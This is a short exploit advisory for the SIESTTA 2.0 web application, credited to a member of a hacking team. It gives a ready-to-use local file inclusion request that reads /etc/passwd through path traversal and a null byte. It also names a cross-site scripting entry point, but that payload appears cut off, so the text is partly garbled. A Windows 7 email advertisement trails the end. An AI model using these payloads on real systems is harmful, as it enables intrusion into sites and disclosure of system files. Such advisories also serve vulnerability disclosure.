#################################################################### # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities # download: http://ramoncastro.es/siestta_old/ # # Author: Jose Luis Gongora Fernandez 'aka' JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # # "need" register_globals = On # #################################################################### - [#LFI] !EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00 - [#XSS] '.$usuario.'

... ?> !EXPLOIT: /carga_foto_al.php?usuario= __h0__ _________________________________________________________________ Aprende los trucos de Windows 7 con la gente que ya lo han probado Windows 7. http://www.sietesunpueblodeexpertos.com/index_windows7.html